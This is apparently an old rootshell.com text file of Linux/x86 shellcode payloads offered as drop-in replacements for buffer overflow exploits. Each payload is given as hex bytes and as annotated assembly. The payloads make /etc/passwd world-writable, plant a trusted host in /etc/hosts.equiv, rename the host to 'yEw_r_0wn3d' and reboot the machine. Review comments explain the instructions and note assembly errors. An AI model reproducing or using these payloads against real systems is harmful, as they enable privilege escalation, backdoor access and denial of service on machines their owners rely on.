


Assembly drop-in replacements for your favorite exploits. (x86 only)





[ http://www.rootshell.com/ ]

-----------------[ begin asmcodes.txt ]---------------------

-- Assembly drop-in replacements --
(Probably useless, but can be a little fun ;-) )

Here are some assembly instructions that you can drop into your favorite
buffer overflow exploit. Generally, replacing the existing shellcode in an
existing buffer overrun with one of these is all you need to do. Feel free to
modify and experiment with these.  (Sorry about the nulls in them before
;-) )

/* This one changes the mode on /etc/passwd to 777 */
/* Linux/x86 int 0x80 payload; it is the byte encoding of the "chmod"
 * listing in the Source code section below: jmp/call/pop "get PC" stub,
 * in-place NUL store at path+11, chmod(path, 0777), exit.  The store means
 * it only works when the payload sits in writable memory (NX/W^X stops it).
 * The last four bytes (89 ec 5d c3 = movl %ebp,%esp; popl %ebp; ret) come
 * after exit() and are never reached.
 * All four arrays on this page share the name `shellcode`; they are
 * alternatives and are not meant to be compiled into one file.
 * NOTE(review): the eb 03 5f eb 05 e8 f8 ff ff ff prefix is a well-known
 * byte signature for this payload family. */
char shellcode[]=
  "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"
  "\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"
  "\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"
  "\x73\x73\x77\x64\x89\xec\x5d\xc3";

/* This one creates /etc/hosts.equiv with a host called b00ger */
/* Linux/x86 int 0x80 payload; byte encoding of the hosts.equiv listing
 * in the Source code section below: "get PC" stub, NUL store at path+16
 * (so the payload must be in writable memory),
 * open(path, O_WRONLY|O_CREAT|O_APPEND, 0644), write(fd, "b00ger\n", 7),
 * exit.  The open() return value is used as the fd without any check for a
 * -errno result, and writing under /etc only succeeds if the hijacked
 * process already runs with that privilege.  The trailing 89 ec 5d c3
 * (movl %ebp,%esp; popl %ebp; ret) follows exit() and is unreachable. */
char shellcode[]=
  "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"
  "\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"
  "\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31"
  "\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"
  "\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"
  "\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";

/* This one is useless: it just changes the hostname to yEw_r_0wn3d */
/* Linux/x86 int 0x80 payload; byte encoding of the sethostname listing
 * in the Source code section below: "get PC" stub, sethostname(name, 11),
 * exit.  Because sethostname() takes an explicit length there is no
 * in-place NUL store, so this one does not need a writable buffer.  The
 * kernel refuses the call for an unprivileged process; the result is not
 * checked.  The trailing 89 ec 5d c3 (movl %ebp,%esp; popl %ebp; ret)
 * follows exit() and is unreachable. */
char shellcode[]=
   "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"
   "\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"
   "\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"
   "\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";

/* This is also useless: it just reboots an x86 machine */
/* Linux/x86 int 0x80 payload; byte encoding of the reboot listing in the
 * Source code section below: "get PC" stub (the popped edi is never used,
 * this payload addresses no data), sync(), reboot(magic1, magic2,
 * LINUX_REBOOT_CMD_RESTART), exit.  reboot() is refused by the kernel for
 * an unprivileged process and neither result is checked.  The trailing
 * 89 ec 5d c3 (movl %ebp,%esp; popl %ebp; ret) follows exit() and is
 * unreachable. */
char shellcode[]=
   "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"
   "\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"
   "\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"
   "\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"
   "\xcd\x80\x89\xec\x5d\xc3";


 -- Source code --

   # changes mode on /etc/passwd to 777 
   # making it writeable by anyone. 
   #
   # Linux/x86 (int 0x80), AT&T syntax.  The jmp/call/pop prologue is the
   # classic "get PC" trick: after `popl %edi`, edi = &yo, and every data
   # reference below is computed as edi + (label - yo).
   # NOTE(review): the NUL terminator is stored into the payload itself
   # (11(%ebx)), so this only runs while the buffer is writable; NX/W^X
   # stops it.  Neither syscall result is checked.  chmod on /etc/passwd
   # only succeeds if the hijacked process already has that privilege.

   jmp rootshell
   hey:
      popl %edi                 # edi = return address pushed by `call hey` = &yo
      jmp yo
   rootshell:
      call hey                  # pushes &yo, then jumps back to hey
   yo:
                                # chmod() is system call 15 (0xf)
                                # (see /usr/include/asm/unistd.h)
                                # eax = syscall number, ebx = path, ecx = mode
      xorl %ebx,%ebx            # ebx = 0
      movb $(phile-yo),%bl      # bl = offset of the path from yo (fits in one byte)
      addl %edi,%ebx            # ebx = &phile
      xorb %al,%al              # al = 0
      movb %al,11(%ebx)         # NUL-terminate the path in place (11 = strlen("/etc/passwd"))
      xorl %ecx,%ecx            # ecx = 0
      movw $00777,%cx           # cx = 0777 (octal) -> mode rwxrwxrwx
      xorl %eax,%eax            # eax = 0
      movb $0xf,%al             # syscall 15 is chmod (not chown as the original comment said)
      int $0x80                 # chmod("/etc/passwd", 0777); return value ignored
      xorl %eax,%eax            # eax = 0
      movb $0x01,%al            # syscall 1 is exit
      int $0x80                 # exit(); ebx still holds the path pointer, so the status is junk
   phile:
   .ascii \"/etc/passwd\"       # 11 bytes; the byte after it is patched to NUL above
                                # (the `\"` looks like an artifact of the text being
                                # extracted from a C string -- TODO confirm)

-------------------------

   # Creates the file /etc/hosts.equiv if it does
   # not exist (or appends to if it does) and will
   # insert the host:   b00ger
   # changing this should be trivial
   #
   # Linux/x86 (int 0x80), AT&T syntax.  Same jmp/call/pop "get PC" stub as
   # the chmod listing: after popl, edi = &phoo and every data reference is
   # edi + (label - phoo).  Writing under /etc requires the hijacked process
   # to already run with that privilege; neither syscall result is checked.
   # NOTE(review): the NUL terminator is stored into the payload itself
   # (16(%ebx)), so the buffer must be writable (NX/W^X stops it).

   jmp rootshell
   coded_by_bmV:
      popl %edi                 # edi = &phoo (return address pushed by the call)
   jmp phoo
   rootshell:
      call coded_by_bmV
   phoo:
                                # open() is system call 5
                                # (see /usr/include/asm/unistd.h)
                                # eax = syscall number, ebx = path,
                                # ecx = flags, edx = mode; fd returned in eax
      xorl %ebx,%ebx            # ebx = 0
      movb $(file-phoo),%bl     # bl = offset of the path from phoo
      addl %edi,%ebx            # ebx = &file
      xorl %al, %al             # NOTE(review): 32-bit op on 8-bit registers does not
                                # assemble as written; the hex above encodes xorl %eax,%eax
      movb %al,16(%ebx)         # overwrite the `.byte 1` placeholder with NUL
                                # (16 = strlen("/etc/hosts.equiv"))
      xorl %ecx,%ecx            # ecx = 0
      movw $0x441,%cx           # O_WRONLY | O_CREAT | O_APPEND
      xorl %edx,%edx            # edx = 0
      movw $00644,%dx           # mode 0644 -rw-r--r-- (applies only if the file is created)
      xorl %eax,%eax            # eax = 0
      movb $0x5,%al             # syscall 5 is open()
      int $0x80                 # eax = open("/etc/hosts.equiv", flags, 0644)
                                # write() is system call 4
                                # (see /usr/include/asm/unistd.h)
                                # eax = 4, ebx = fd, ecx = buffer, edx = length
      movl %eax,%ebx            # ebx = fd; a negative (-errno) result is passed on unchecked
      xorl %ecx, %ecx           # ecx = 0
      movb $(string-phoo),%cl   # cl = offset of "b00ger\n" from phoo
      addl %edi,%ecx            # ecx = &string
      xorl %edx,%edx            # edx = 0
      movb $7,%dl               # edx = strlen("b00ger\n") == 7 (includes the newline)
      xorl %eax,%eax            # eax = 0
      movb $0x04,%al            # syscall 4 is write()
      int $0x80                 # write(fd, "b00ger\n", 7); return value ignored
      xorl %eax,%eax            # eax = 0
      movb $0x01,%al            # syscall 1 is exit()
      int $0x80                 # exit(); the kernel closes the fd on process exit
   file:
   .ascii \"/etc/hosts.equiv\"  # 16 bytes, no terminator in the data itself
   .byte 1                      # placeholder; set to 0 at run time by the store above
   string:
   .ascii \"b00ger\n\"          # 7 bytes incl. newline; no terminator needed (length is passed)

-------------------------

  # written just for grins ;-)
  # code to change to hostname of the
  # target machine to: yEw_r_0wn3d 
  # Yes, I know this is useless :P
  #
  # Linux/x86 (int 0x80), AT&T syntax.  Same "get PC" stub: edi = &asmcode.
  # sethostname() takes an explicit length, so unlike the chmod and
  # hosts.equiv listings this one never writes into its own buffer.  The
  # kernel refuses the call for an unprivileged process; the result is not
  # checked.

  jmp rootshell
  by_bm5:
     popl %edi                      # edi = &asmcode
     jmp asmcode
  rootshell:
     call by_bm5
  asmcode:
                                    # 74 (0x4a) is sethostname()
                                    # (see /usr/include/asm/unistd.h)
                                    # eax = 74, ebx = name, ecx = length
     xorl %eax,%eax                 # eax = 0
     movb $0x4a,%al                 # al = 74 (sethostname)
     xorl %ebx,%ebx                 # ebx = 0
     movb $(string-asmcode),%bl     # bl = offset of the name from asmcode
     addl %edi,%ebx                 # ebx = &string
     xorl %ecx,%ecx                 # ecx = 0
     movb $0x0b,%cl                 # ecx = strlen("yEw_r_0wn3d") == 11
     int $0x80                      # sethostname("yEw_r_0wn3d", 11); return value ignored
     xorl %eax,%eax                 # eax = 0
     movb $0x01,%al                 # syscall 1 is exit()
     int $0x80                      # exit()
  .byte                             # NOTE(review): no operand -- looks like a stray
                                    # directive; the hex above has no byte between
                                    # the exit syscall and the string
  string:
  .ascii \"yEw_r_0wn3d\"            # 11 bytes; no terminator needed (length is passed)

-------------------------

  # reboots a Linux x86 box 
  # also quite useless, but 
  # good for learning.
  #
  # Linux/x86 (int 0x80), AT&T syntax.  Carries the same jmp/call/pop stub
  # as the other listings, but edi is never used afterwards -- this payload
  # addresses no data.  sync() then reboot(); both results are ignored.
  # reboot() is refused by the kernel for an unprivileged process.

  jmp rootshell
  coded_by_bmV:
     popl %edi                  # edi = &reb00t (unused below)
     jmp reb00t
  rootshell:
     call coded_by_bmV
  reb00t:
                                # sync() is syscall 36 (0x24)
                                # (see /usr/include/asm/unistd.h)
     xorl %eax,%eax             # eax = 0
     movb $0x24,%eax            # NOTE(review): byte move into a 32-bit register does
                                # not assemble as written; the hex above encodes
                                # movb $0x24,%al
     int $0x80                  # sync()
                                # reboot() is syscall 88 (0x58)
                                # (see /usr/include/asm/unistd.h)
                                # eax = 88, ebx = magic1, ecx = magic2, edx = command
                                # (see manual page for reboot)
     xorl %eax,%eax             # eax = 0
     movb $0x58,%eax            # NOTE(review): same operand-size mismatch; the hex
                                # above encodes movb $0x58,%al
     movl $0xfee1dead,%ebx      # LINUX_REBOOT_MAGIC1
     movl $672274793,%ecx       # LINUX_REBOOT_MAGIC2 (0x28121969)
     movl $0x1234567,%edx       # LINUX_REBOOT_CMD_RESTART
                                # read reboot manpage!
     int $0x80                  # reboot(); does not return if it succeeds
     xorl %eax,%eax             # eax = 0 (only reached if reboot() failed)
     movb $0x01,%al             # syscall 1 is exit()
     int $0x80                  # exit()

-------------------------

		  -->	Have fun!


